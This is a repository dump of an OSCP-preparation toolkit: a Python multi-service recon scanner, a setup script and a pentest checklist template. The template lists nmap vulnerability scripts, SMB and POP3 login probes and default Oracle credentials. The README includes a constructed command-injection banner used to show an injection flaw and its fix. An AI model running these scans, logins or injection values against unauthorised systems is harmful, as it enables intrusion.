Repository: xapax/oscp
Branch: master
Commit: 7ea469640337
Files: 6
Total size: 43.4 KB
Directory structure:
gitextract_kkjeoamh/
├── README.md
├── recon_enum/
│ └── reconscan.py
├── reports/
│ └── reports.txt
├── setup.sh
└── templates/
├── linux-template.md
└── windows-template.md
================================================
FILE CONTENTS
================================================
================================================
FILE: README.md
================================================
# oscp
## Reconscan.py
This script is based on the script by [Mike Czumak](http://www.securitysift.com/offsec-pwb-oscp/). But it is heavily rewritten, some things have been added, other stuff has been removed. The script is written as a preparation for the OSCP exam. It was never meant to be a general script. So if you want to use it you have to make sure to fix all the hardcoded paths. The script is multithreaded and can be run against several hosts at once.
The script is invoked like this:
```
python reconscan.py 192.168.1.101 192.168.1.102 192.168.1.103
```
One important thing to note is that I removed the scan for all ports, because it would sometimes take too long to run. So make sure you either add that scan or run it afterwards (for example `nmap -sV -p- -oN full.nmap <ip>`), so you don't miss any ports.
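As an added example (not code from this repository): a small parser for nmap's normal `-oN` output that reads the default scan and a later `-p-` scan and lists the open ports the first one never saw. The two scan outputs embedded below are constructed for the example, not captured from a real host.

```python
import re

# Port lines of nmap's normal (-oN) output, e.g.
#   8080/tcp open  http-proxy  Squid http proxy 3.1.19
# state can be "open", "filtered", "open|filtered", ...; version is optional.
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>[\w|]+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*))?$"
)


def parse_open_ports(nmap_output):
    """Return {(port, proto): (service, version)} for every line whose state is exactly 'open'."""
    found = {}
    for line in nmap_output.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m or m.group("state") != "open":
            continue
        key = (int(m.group("port")), m.group("proto"))
        found[key] = (m.group("service"), (m.group("version") or "").strip())
    return found


def missed_ports(default_scan, full_scan):
    """Ports open in the -p- scan that the default (top-1000) scan did not report, sorted by port."""
    seen = parse_open_ports(default_scan)
    everything = parse_open_ports(full_scan)
    return {k: v for k, v in sorted(everything.items()) if k not in seen}


# Constructed sample outputs (not real scans): the default scan covers nmap's top 1000 ports,
# the full scan was run with -p- and finds two more services.
DEFAULT_SCAN = """\
Nmap scan report for 192.168.1.101
Host is up (0.00042s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 5.3p1 Debian 3ubuntu7
80/tcp  open  http        Apache httpd 2.2.14 ((Ubuntu))
139/tcp open  netbios-ssn Samba smbd 3.X
"""

FULL_SCAN = """\
Nmap scan report for 192.168.1.101
Host is up (0.00039s latency).
Not shown: 65530 closed ports
PORT      STATE    SERVICE     VERSION
22/tcp    open     ssh         OpenSSH 5.3p1 Debian 3ubuntu7
80/tcp    open     http        Apache httpd 2.2.14 ((Ubuntu))
139/tcp   open     netbios-ssn Samba smbd 3.X
8009/tcp  open     ajp13       Apache Jserv (Protocol v1.3)
8180/tcp  open     http        Apache Tomcat/Coyote JSP engine 1.1
60000/tcp filtered unknown
"""

if __name__ == "__main__":
    for (port, proto), (service, version) in missed_ports(DEFAULT_SCAN, FULL_SCAN).items():
        print("missed: %d/%s %s %s" % (port, proto, service, version))
```

Feed it the two `.nmap` files written with `-oN` and anything it prints is a service that never went through the per-service enumeration; the filtered 60000/tcp is deliberately left out because it is not confirmed open.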
Please note that the script includes dirb and nikto-scans that are very invasive. The script also includes several nmap-scripts that check for vulnerabilities. So yeah, this script would be pretty illegal and bad to run against a machine you don't have permission to attack.
## Templates
I created two templates that I used as a guide for every machine I attacked. One template is for Linux machines and the other for Windows. There are some differences between them. The templates became kind of my checklists. They are divided into three sections: **recon**, **privilege escalation** and **loot**.
The templates are written in markdown, but I never actually rendered them, so I don't really know what they look like rendered. They are probably pretty messy. I also used them together with markdown syntax highlighting in my editor, so it became easy to navigate the files.
The templates have a few keywords in them, like **INSERTIPADDRESS**. These are hooks that are read by reconscan.py, and it inserts the target machine's IP address automatically. Some other things are also inserted automatically, like a basic nmap scan and a nikto scan.
Wherever there are references to a book, this is the book: https://bobloblaw.gitbooks.io/security/content/
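One thing to be careful about with these hooks is that the text being inserted comes from the target. If the substitution is done by building a shell command string around that text (for instance `replace HOOK "<data>" -- file` run through a shell), a banner containing a double quote, `;` or `$(...)` runs commands on the scanning box. The added example below is mine, not code from this repository: it contrasts that command string with a quoted version and with doing the replacement in Python. The hostile banner, template snippet and report path are constructed for the example.

```python
import shlex

# Template hooks (names from the repository's templates)
HOOKS = {
    "portscan": "INSERTTCPSCAN",
    "ssh-connect": "INSERTSSHCONNECT",
    "ftp-connect": "INSERTFTPTEST",
    "nikto": "INSERTNIKTOSCAN",
}


def unsafe_replace_command(hook, data, path):
    """The kind of command string a naive implementation hands to subprocess
    with shell=True. `data` is untrusted target output; every quote, ';' or
    $(...) in it is interpreted by the shell, not treated as text."""
    return 'replace %s "%s" -- %s' % (hook, data, path)


def quoted_replace_command(hook, data, path):
    """Same command with every untrusted part passed through shlex.quote,
    so the shell sees `data` as one literal word."""
    return "replace %s %s -- %s" % (shlex.quote(hook), shlex.quote(data), shlex.quote(path))


def fill_hook(template_text, hook, data):
    """Do the substitution in Python. No shell is involved, so the data stays
    inert whatever it contains. Fails loudly if the hook is missing (already
    filled, or a typo) instead of silently writing nothing."""
    if hook not in template_text:
        raise KeyError("hook %s not present in template" % hook)
    return template_text.replace(hook, data)


def shell_words(cmd):
    """How a POSIX shell tokenises the string (shlex keeps ';' attached to a
    word, which is enough to see the injected commands appear as words)."""
    return shlex.split(cmd)


# Constructed hostile SSH banner (not from a real host). The embedded double
# quote closes the "..." argument; the rest becomes further shell commands.
HOSTILE_BANNER = 'SSH-2.0-OpenSSH_7.4"; touch /tmp/pwned; echo "$(id)'
TEMPLATE = "### Port 22 - SSH\nINSERTSSHCONNECT\n```\nnc INSERTIPADDRESS 22\n```\n"
PATH = "../reports/192.168.1.101/mapping-linux.md"

if __name__ == "__main__":
    hook = HOOKS["ssh-connect"]
    print(unsafe_replace_command(hook, HOSTILE_BANNER, PATH))
    print(quoted_replace_command(hook, HOSTILE_BANNER, PATH))
    print(fill_hook(TEMPLATE, hook, HOSTILE_BANNER))
```

The Python replacement is the one to use in a scanner: it needs no quoting discipline at all, and the scan output ends up in the report verbatim.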
================================================
FILE: recon_enum/reconscan.py
================================================
#!/usr/bin/env python3
import fcntl
import multiprocessing
import os
import re
import shutil
import socket
import subprocess
import sys

# Todo:
# Add a mysql nmap-script scan for port 3306 (the MySQL section of the template has the command).
#
# The report/template directories and the dirb wordlists below are hard-coded for the
# author's setup; adjust them before use (see README).
REPORTS_DIR = "../reports"
TEMPLATES_DIR = "../templates"
DIRB_WORDLISTS = "/usr/share/wordlist/dirb/big.txt,/usr/share/wordlist/dirb/vulns/cgis.txt"

# nmap http scripts, shared by the http and https enumeration
HTTP_SCRIPTS = ",".join([
    "http-vhosts", "http-userdir-enum", "http-apache-negotiation", "http-backup-finder",
    "http-config-backup", "http-default-accounts", "http-methods", "http-method-tamper",
    "http-passwd", "http-robots.txt", "http-devframework", "http-enum", "http-frontpage-login",
    "http-git", "http-iis-webdav-vuln", "http-php-version", "http-shellshock",
    "http-vuln-cve2015-1635",
])

# Template hooks filled in by write_to_file (INSERTIPADDRESS is filled in when the folder is created)
HOOKS = {
    "portscan": "INSERTTCPSCAN",
    "dirb": "INSERTDIRBSCAN",
    "nikto": "INSERTNIKTOSCAN",
    "ftp-connect": "INSERTFTPTEST",
    "smtp-connect": "INSERTSMTPCONNECT",
    "ssh-connect": "INSERTSSHCONNECT",
    "pop3-connect": "INSERTPOP3CONNECT",
    "curl": "INSERTCURLHEADER",
}

# Targets are interpolated into shell commands, so only accept IPs/hostnames
TARGET_RE = re.compile(r"^[A-Za-z0-9.\-]+$")

# Port lines of nmap's normal output, e.g. "80/tcp   open  http    Apache httpd 2.2.8"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)")


class bcolors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'


def run_cmd(cmd):
    """Run a shell command and return its combined stdout/stderr as text.
    nikto and dirb exit non-zero when they find something, so a non-zero
    status must not abort the scan (check_output would raise)."""
    result = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE,
                            stderr=subprocess.STDOUT, text=True)
    return result.stdout


# Creates a function for multiprocessing. Several things at once.
def multProc(targetin, scanip, port):
    p = multiprocessing.Process(target=targetin, args=(scanip, port))
    p.start()
    return p


def recv_text(s):
    """Read up to 1024 bytes and decode; empty string if the service stays silent."""
    try:
        return s.recv(1024).decode("utf-8", "replace")
    except socket.timeout:
        return ""


def connect_to_port(ip_address, port, service):
    """Grab the banner and, for ftp/pop3, try a trivial login. The raw exchange
    goes into the INSERT*CONNECT hooks of the templates."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(10)  # a silent service must not hang this worker forever
    try:
        s.connect((ip_address, int(port)))
        banner = recv_text(s)
        if service == "ftp":
            s.sendall(b"USER anonymous\r\n")
            user = recv_text(s)
            s.sendall(b"PASS anonymous\r\n")
            password = recv_text(s)
            write_to_file(ip_address, "ftp-connect", banner + "\r\n" + user + "\r\n" + password)
        elif service == "smtp":
            write_to_file(ip_address, "smtp-connect", banner + "\r\n")
        elif service == "ssh":
            write_to_file(ip_address, "ssh-connect", banner)
        elif service == "pop3":
            s.sendall(b"USER root\r\n")
            user = recv_text(s)
            s.sendall(b"PASS root\r\n")
            password = recv_text(s)
            write_to_file(ip_address, "pop3-connect", banner + user + password)
    except OSError as e:
        print(bcolors.WARNING + "WARN: %s connect to %s:%s failed: %s" % (service, ip_address, port, e) + bcolors.ENDC)
    finally:
        s.close()


def write_to_file(ip_address, enum_type, data):
    """Replace the template hook for enum_type with the scan output, in both
    mapping files. The substitution is done in Python on purpose: `data` is
    whatever the target sent back, and passing it through `replace ... "<data>"`
    with shell=True would let a hostile banner or page run commands on the
    scanning box. The exclusive lock serialises the workers that write to the
    same file concurrently."""
    hook = HOOKS.get(enum_type)
    if hook is None:
        return
    file_path_linux = '%s/%s/mapping-linux.md' % (REPORTS_DIR, ip_address)
    file_path_windows = '%s/%s/mapping-windows.md' % (REPORTS_DIR, ip_address)
    print(bcolors.OKGREEN + "INFO: Writing " + enum_type + " to template files:\n " + file_path_linux + " \n" + file_path_windows + bcolors.ENDC)
    for path in (file_path_linux, file_path_windows):
        with open(path, "r+") as f:
            fcntl.flock(f, fcntl.LOCK_EX)
            content = f.read()
            f.seek(0)
            f.write(content.replace(hook, data))
            f.truncate()


def dirb(ip_address, port, url_start, wordlist=DIRB_WORDLISTS):
    print(bcolors.HEADER + "INFO: Starting dirb scan for " + ip_address + bcolors.ENDC)
    # dirb <url> <wordlist,wordlist,...> ; -r = do not recurse
    DIRBSCAN = "dirb %s://%s:%s %s -o %s/%s/dirb-%s-%s.txt -r" % (
        url_start, ip_address, port, wordlist, REPORTS_DIR, ip_address, ip_address, port)
    print(bcolors.HEADER + DIRBSCAN + bcolors.ENDC)
    results_dirb = run_cmd(DIRBSCAN)
    print(bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with dirb scan for " + ip_address + bcolors.ENDC)
    print(results_dirb)
    write_to_file(ip_address, "dirb", results_dirb)


def nikto(ip_address, port, url_start):
    print(bcolors.HEADER + "INFO: Starting nikto scan for " + ip_address + bcolors.ENDC)
    NIKTOSCAN = "nikto -h %s://%s:%s -o %s/%s/nikto-%s-%s-%s.txt" % (
        url_start, ip_address, port, REPORTS_DIR, ip_address, url_start, ip_address, port)
    print(bcolors.HEADER + NIKTOSCAN + bcolors.ENDC)
    results_nikto = run_cmd(NIKTOSCAN)
    print(bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with NIKTO-scan for " + ip_address + bcolors.ENDC)
    print(results_nikto)
    write_to_file(ip_address, "nikto", results_nikto)


def httpNmap(ip_address, port, label):
    """nmap web script scan, shared by httpEnum and httpsEnum."""
    print(bcolors.HEADER + "INFO: Performing nmap web script scan for " + ip_address + ":" + str(port) + bcolors.ENDC)
    HTTPSCAN = "nmap -sV -Pn -p %s --script=%s -oN %s/%s/%s_%s_%s.nmap %s" % (
        port, HTTP_SCRIPTS, REPORTS_DIR, ip_address, ip_address, label, port, ip_address)
    print(bcolors.HEADER + HTTPSCAN + bcolors.ENDC)
    results = run_cmd(HTTPSCAN)
    print(bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with %s-scan for " % label.upper() + ip_address + bcolors.ENDC)
    print(results)


def httpEnum(ip_address, port):
    print(bcolors.HEADER + "INFO: Detected http on " + ip_address + ":" + str(port) + bcolors.ENDC)
    dirb_process = multiprocessing.Process(target=dirb, args=(ip_address, port, "http"))
    dirb_process.start()
    nikto_process = multiprocessing.Process(target=nikto, args=(ip_address, port, "http"))
    nikto_process.start()
    CURLSCAN = "curl -sI http://%s:%s" % (ip_address, port)
    print(bcolors.HEADER + CURLSCAN + bcolors.ENDC)
    curl_results = run_cmd(CURLSCAN)
    write_to_file(ip_address, "curl", curl_results)
    httpNmap(ip_address, port, "http")


def httpsEnum(ip_address, port):
    print(bcolors.HEADER + "INFO: Detected https on " + ip_address + ":" + str(port) + bcolors.ENDC)
    dirb_process = multiprocessing.Process(target=dirb, args=(ip_address, port, "https"))
    dirb_process.start()
    nikto_process = multiprocessing.Process(target=nikto, args=(ip_address, port, "https"))
    nikto_process.start()
    SSLSCAN = "sslscan %s:%s >> %s/%s/ssl_scan_%s_%s" % (ip_address, port, REPORTS_DIR, ip_address, ip_address, port)
    print(bcolors.HEADER + SSLSCAN + bcolors.ENDC)
    run_cmd(SSLSCAN)
    print(bcolors.OKGREEN + "INFO: CHECK FILE - Finished with SSLSCAN for " + ip_address + bcolors.ENDC)
    httpNmap(ip_address, port, "https")


def mssqlEnum(ip_address, port):
    print(bcolors.HEADER + "INFO: Detected MS-SQL on " + ip_address + ":" + str(port) + bcolors.ENDC)
    print(bcolors.HEADER + "INFO: Performing nmap mssql script scan for " + ip_address + ":" + str(port) + bcolors.ENDC)
    MSSQLSCAN = ("nmap -sV -Pn -p %s --script=ms-sql-info,ms-sql-config,ms-sql-dump-hashes "
                 "--script-args=mssql.instance-port=%s,mssql.username=sa,mssql.password=sa "
                 "-oN %s/%s/mssql_%s.nmap %s") % (port, port, REPORTS_DIR, ip_address, ip_address, ip_address)
    print(bcolors.HEADER + MSSQLSCAN + bcolors.ENDC)
    mssql_results = run_cmd(MSSQLSCAN)
    print(bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with MSSQL-scan for " + ip_address + bcolors.ENDC)
    print(mssql_results)


def smtpEnum(ip_address, port):
    print(bcolors.HEADER + "INFO: Detected smtp on " + ip_address + ":" + str(port) + bcolors.ENDC)
    connect_to_port(ip_address, port, "smtp")
    SMTPSCAN = ("nmap -sV -Pn -p %s --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,"
                "smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 %s -oN %s/%s/smtp_%s.nmap") % (
        port, ip_address, REPORTS_DIR, ip_address, ip_address)
    print(bcolors.HEADER + SMTPSCAN + bcolors.ENDC)
    smtp_results = run_cmd(SMTPSCAN)
    print(bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with SMTP-scan for " + ip_address + bcolors.ENDC)
    print(smtp_results)


def smbNmap(ip_address, port):
    print(bcolors.HEADER + "INFO: Detected SMB on " + ip_address + ":" + str(port) + bcolors.ENDC)
    SMBSCAN = ("nmap --script=smb-enum-shares,smb-ls,smb-enum-users,smb-mbenum,smb-os-discovery,"
               "smb-security-mode,smb-vuln-cve2009-3103,smb-vuln-ms06-025,smb-vuln-ms07-029,"
               "smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061,smb-vuln-regsvc-dos "
               "%s -oN %s/%s/smb_%s.nmap") % (ip_address, REPORTS_DIR, ip_address, ip_address)
    print(bcolors.HEADER + SMBSCAN + bcolors.ENDC)
    smbNmap_results = run_cmd(SMBSCAN)
    print(bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with SMB-Nmap-scan for " + ip_address + bcolors.ENDC)
    print(smbNmap_results)


def smbEnum(ip_address, port):
    print(bcolors.HEADER + "INFO: Running enum4linux against " + ip_address + ":" + str(port) + bcolors.ENDC)
    enum4linux = "enum4linux -a %s > %s/%s/enum4linux_%s 2>/dev/null" % (ip_address, REPORTS_DIR, ip_address, ip_address)
    run_cmd(enum4linux)
    print(bcolors.OKGREEN + "INFO: CHECK FILE - Finished with ENUM4LINUX for " + ip_address + bcolors.ENDC)


def ftpEnum(ip_address, port):
    print(bcolors.HEADER + "INFO: Detected ftp on " + ip_address + ":" + str(port) + bcolors.ENDC)
    connect_to_port(ip_address, port, "ftp")
    FTPSCAN = ("nmap -sV -Pn -p %s --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,"
               "ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 -oN '%s/%s/ftp_%s.nmap' %s") % (
        port, REPORTS_DIR, ip_address, ip_address, ip_address)
    print(bcolors.HEADER + FTPSCAN + bcolors.ENDC)
    results_ftp = run_cmd(FTPSCAN)
    print(bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with FTP-Nmap-scan for " + ip_address + bcolors.ENDC)
    print(results_ftp)


def udpScan(ip_address):
    print(bcolors.HEADER + "INFO: Starting UDP scans for " + ip_address + bcolors.ENDC)
    UDPSCAN = "nmap -Pn -A -sC -sU -T 3 --top-ports 200 -oN '%s/%s/udp_%s.nmap' %s" % (
        REPORTS_DIR, ip_address, ip_address, ip_address)
    print(bcolors.HEADER + UDPSCAN + bcolors.ENDC)
    udpscan_results = run_cmd(UDPSCAN)
    print(bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with UDP-Nmap scan for " + ip_address + bcolors.ENDC)
    print(udpscan_results)
    UNICORNSCAN = "unicornscan -mU -I %s > %s/%s/unicorn_udp_%s.txt" % (ip_address, REPORTS_DIR, ip_address, ip_address)
    run_cmd(UNICORNSCAN)
    print(bcolors.OKGREEN + "INFO: CHECK FILE - Finished with UNICORNSCAN for " + ip_address + bcolors.ENDC)


def sshScan(ip_address, port):
    print(bcolors.HEADER + "INFO: Detected SSH on " + ip_address + ":" + str(port) + bcolors.ENDC)
    connect_to_port(ip_address, port, "ssh")
    SSHSCAN = "nmap -sV -Pn -p %s --script=ssh-auth-methods,ssh-hostkey,ssh-run,sshv1 -oN '%s/%s/ssh_%s.nmap' %s" % (
        port, REPORTS_DIR, ip_address, ip_address, ip_address)
    print(bcolors.HEADER + SSHSCAN + bcolors.ENDC)
    results_ssh = run_cmd(SSHSCAN)
    print(bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with SSH-Nmap-scan for " + ip_address + bcolors.ENDC)
    print(results_ssh)


def pop3Scan(ip_address, port):
    print(bcolors.HEADER + "INFO: Detected POP3 on " + ip_address + ":" + str(port) + bcolors.ENDC)
    connect_to_port(ip_address, port, "pop3")
    POP3SCAN = "nmap -sV -Pn -p %s --script=pop3-brute,pop3-capabilities,pop3-ntlm-info -oN '%s/%s/pop3_%s.nmap' %s" % (
        port, REPORTS_DIR, ip_address, ip_address, ip_address)
    print(bcolors.HEADER + POP3SCAN + bcolors.ENDC)
    results_pop3 = run_cmd(POP3SCAN)
    print(bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with POP3-Nmap-scan for " + ip_address + bcolors.ENDC)
    print(results_pop3)


def snmpEnum(ip_address, port):
    # Only reached if nmap reports snmp on a TCP port; the UDP side is covered by udpScan.
    print(bcolors.HEADER + "INFO: Detected SNMP on " + ip_address + ":" + str(port) + bcolors.ENDC)
    SNMPSCAN = "nmap -sV -sU -Pn -p %s --script=snmp-netstat,snmp-processes -oN '%s/%s/snmp_%s.nmap' %s" % (
        port, REPORTS_DIR, ip_address, ip_address, ip_address)
    print(bcolors.HEADER + SNMPSCAN + bcolors.ENDC)
    results_snmp = run_cmd(SNMPSCAN)
    print(bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with SNMP-Nmap-scan for " + ip_address + bcolors.ENDC)
    print(results_snmp)


def parse_open_tcp_ports(results):
    """Map nmap service name -> list of open TCP port numbers (as strings)."""
    serv_dict = {}
    for line in results.splitlines():
        m = PORT_LINE.match(line.strip())
        if m and m.group(2) == "tcp":
            serv_dict.setdefault(m.group(3), []).append(m.group(1))
    return serv_dict


def nmapScan(ip_address):
    ip_address = ip_address.strip()
    print(bcolors.OKGREEN + "INFO: Running general TCP/UDP nmap scans for " + ip_address + bcolors.ENDC)
    # -O needs root. This is nmap's default port range; run a -p- scan separately (see README).
    TCPSCAN = "nmap -sV -O %s -oN '%s/%s/%s.nmap'" % (ip_address, REPORTS_DIR, ip_address, ip_address)
    print(bcolors.HEADER + TCPSCAN + bcolors.ENDC)
    results = run_cmd(TCPSCAN)
    print(bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with BASIC Nmap-scan for " + ip_address + bcolors.ENDC)
    print(results)
    p = multiprocessing.Process(target=udpScan, args=(ip_address,))
    p.start()
    write_to_file(ip_address, "portscan", results)
    serv_dict = parse_open_tcp_ports(results)
    # go through the service dictionary to call additional targeted enumeration functions
    for serv, ports in serv_dict.items():
        for port in ports:
            if serv == "https" or serv.startswith("ssl"):  # nmap prints e.g. "https" or "ssl/http"
                multProc(httpsEnum, ip_address, port)
            elif serv.startswith("http"):  # "http", "http-proxy", "http-alt", ...
                multProc(httpEnum, ip_address, port)
            elif "smtp" in serv:
                multProc(smtpEnum, ip_address, port)
            elif "ftp" in serv:
                multProc(ftpEnum, ip_address, port)
            elif serv in ("microsoft-ds", "netbios-ssn"):
                multProc(smbEnum, ip_address, port)
                multProc(smbNmap, ip_address, port)
            elif "ms-sql" in serv:
                multProc(mssqlEnum, ip_address, port)
            elif "ssh" in serv:
                multProc(sshScan, ip_address, port)
            elif "pop3" in serv:
                multProc(pop3Scan, ip_address, port)
            elif "snmp" in serv:
                multProc(snmpEnum, ip_address, port)


if __name__ == '__main__':
    print(bcolors.HEADER)
    print("------------------------------------------------------------")
    print("!!!! RECON SCAN !!!!!")
    print("!!!! A multi-process service scanner !!!!!")
    print("!!!! dirb, nikto, ftp, ssh, mssql, pop3, tcp !!!!!")
    print("!!!! udp, smtp, smb !!!!!")
    print("------------------------------------------------------------")
    if len(sys.argv) < 2:
        print("")
        print("Usage: python reconscan.py <ip> <ip> <ip>")
        print("Example: python reconscan.py 192.168.1.101 192.168.1.102")
        print("")
        print("############################################################")
        print(bcolors.ENDC)
        sys.exit(1)
    print(bcolors.ENDC)

    # Setting ip targets
    targets = [t.strip() for t in sys.argv[1:]]
    bad = [t for t in targets if not TARGET_RE.match(t)]
    if bad:
        print(bcolors.FAIL + "ERROR: not an IP address/hostname: " + ", ".join(bad) + bcolors.ENDC)
        sys.exit(1)

    workers = []
    for scanip in targets:
        target_dir = os.path.join(REPORTS_DIR, scanip)
        if not os.path.isdir(target_dir):
            print(bcolors.HEADER + "INFO: No folder was found for " + scanip + ". Setting up folder." + bcolors.ENDC)
            os.makedirs(os.path.join(target_dir, "exploits"))
            os.makedirs(os.path.join(target_dir, "privesc"))
            print(bcolors.OKGREEN + "INFO: Folder created here: " + target_dir + bcolors.ENDC)
            # Copy both templates and fill in the INSERTIPADDRESS hook (only on first run,
            # so notes already taken in an existing folder are not overwritten)
            for template, mapping in (("windows-template.md", "mapping-windows.md"),
                                      ("linux-template.md", "mapping-linux.md")):
                dst = os.path.join(target_dir, mapping)
                shutil.copy(os.path.join(TEMPLATES_DIR, template), dst)
                with open(dst) as f:
                    content = f.read()
                with open(dst, "w") as f:
                    f.write(content.replace("INSERTIPADDRESS", scanip))
            print(bcolors.OKGREEN + "INFO: Added pentesting templates: " + target_dir + bcolors.ENDC)
        p = multiprocessing.Process(target=nmapScan, args=(scanip,))
        p.start()
        workers.append(p)
    for p in workers:
        p.join()
================================================
FILE: reports/reports.txt
================================================
================================================
FILE: setup.sh
================================================
#!/bin/bash
# Installs a `reconscan` wrapper that changes into recon_enum before running the
# script: reconscan.py uses paths relative to that directory (../reports, ../templates).
folder=$(find /home /usr /var /tmp /opt /mnt /root -type d -name recon_enum -print -quit 2>/dev/null)
if [ -z "$folder" ]; then
    echo "recon_enum directory not found" >&2
    exit 1
fi
printf '#!/bin/bash\ncd %q && python reconscan.py "$@"\n' "$folder" > /usr/bin/reconscan
chmod +x /usr/bin/reconscan
================================================
FILE: templates/linux-template.md
================================================
## Info-sheet
- DNS-Domain name:
- Host name:
- OS:
- Server:
- Kernel:
- Workgroup:
- Windows domain:
Services and ports:
INSERTTCPSCAN
## Recon
```
# Always start with a stealthy scan; an aggressive one can trip defences that close ports on you.
# Syn-scan
nmap -sS INSERTIPADDRESS
# Scan all ports, might take a while.
nmap INSERTIPADDRESS -p-
# Service-version, default scripts, OS:
nmap INSERTIPADDRESS -sV -sC -O -p 111,222,333
# Scan for UDP
nmap INSERTIPADDRESS -sU
unicornscan -mU -v -I INSERTIPADDRESS
# Connect to udp if one is open
nc -u INSERTIPADDRESS 48772
# Monster scan
nmap INSERTIPADDRESS -p- -A -T4 -sC
```
### Port 21 - FTP
- FTP-Name:
- FTP-version:
- Anonymous login:
INSERTFTPTEST
```
nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 -p 21 INSERTIPADDRESS
```
### Port 22 - SSH
- Name:
- Version:
- Takes-password:
- If you have usernames test login with username:username
INSERTSSHCONNECT
```
nc INSERTIPADDRESS 22
```
### Port 25
- Name:
- Version:
- VRFY:
INSERTSMTPCONNECT
```
nc -nvv INSERTIPADDRESS 25
HELO foo<cr><lf>
telnet INSERTIPADDRESS 25
VRFY root
nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 INSERTIPADDRESS
```
### Port 69 - UDP - TFTP
TFTP is UDP, so it only shows up in a UDP scan (nmap -sU); the nmap script for it is tftp-enum.
### Port 110 - Pop3
- Name:
- Version:
INSERTPOP3CONNECT
```
telnet INSERTIPADDRESS 110
USER pelle@INSERTIPADDRESS
PASS admin
or:
USER pelle
PASS admin
# List all emails
list
# Retrieve email number 5, for example
retr 5
```
### Port 111 - Rpcbind
```
rpcinfo -p INSERTIPADDRESS
```
### Port 135 - MSRPC
Some versions are vulnerable.
### Port 143 - Imap
### Port 139/445 - SMB
- Name:
- Version:
- Domain/workgroup name:
- Domain-sid:
- Allows unauthenticated login:
```
nmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smbv2-enabled.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse INSERTIPADDRESS -p 445
enum4linux -a INSERTIPADDRESS
rpcclient -U "" INSERTIPADDRESS
srvinfo
enumdomusers
getdompwinfo
querydominfo
netshareenum
netshareenumall
smbclient -L INSERTIPADDRESS
smbclient //INSERTIPADDRESS/tmp
smbclient \\\\INSERTIPADDRESS\\ipc$ -U john
smbclient //INSERTIPADDRESS/ipc$ -U john
```
### Port 161/162 UDP - SNMP
```
nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes INSERTIPADDRESS
snmp-check -t INSERTIPADDRESS -c public
```
```
# Common community strings
public
private
community
```
### Port 554 - RTSP
### Port 1030/1032/1033/1038
Used by RPC to connect in domain network.
### Port 1521 - Oracle
- Name:
- Version:
- Password protected:
```
tnscmd10g version -h INSERTIPADDRESS
tnscmd10g status -h INSERTIPADDRESS
```
### Port 2049 - NFS
```
showmount -e INSERTIPADDRESS
# If you find anything you can mount it like this:
mount INSERTIPADDRESS:/ /tmp/NFS
mount -t nfs INSERTIPADDRESS:/ /tmp/NFS
```
### Port 2100 - Oracle XML DB
- Name:
- Version:
- Default logins:
```
sys:sys
scott:tiger
```
Default passwords
https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm
### Port 3306 - MySQL
- Name:
- Version:
```
nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse INSERTIPADDRESS -p 3306
mysql --host=INSERTIPADDRESS -u root -p
```
### Port 3339 - Oracle web interface
- Basic info about web service (apache, nginx, IIS)
- Server:
- Scripting language:
- Apache Modules:
- IP-address:
### Port 80 - Web server
- Server:
- Scripting language:
- Apache Modules:
- IP-address:
- Domain-name address:
INSERTCURLHEADER
- Web application (ex, wordpress, joomla, phpmyadmin)
- Name:
- Version:
- Admin-login:
```
# Nikto
nikto -h http://INSERTIPADDRESS
# Nikto with squid proxy
nikto -h INSERTIPADDRESS -useproxy http://INSERTIPADDRESS:4444
# CMS Explorer
cms-explorer -url http://INSERTIPADDRESS -type [Drupal, WordPress, Joomla, Mambo]
# WPScan (vp = Vulnerable Plugins, vt = Vulnerable Themes, u = Users)
wpscan --url http://INSERTIPADDRESS
wpscan --url http://INSERTIPADDRESS --enumerate vp
wpscan --url http://INSERTIPADDRESS --enumerate vt
wpscan --url http://INSERTIPADDRESS --enumerate u
# Joomscan
joomscan -u http://INSERTIPADDRESS
joomscan -u http://INSERTIPADDRESS --enumerate-components
# Get header
curl -i INSERTIPADDRESS
# Get everything
curl -i -L INSERTIPADDRESS
# Check for title and all links
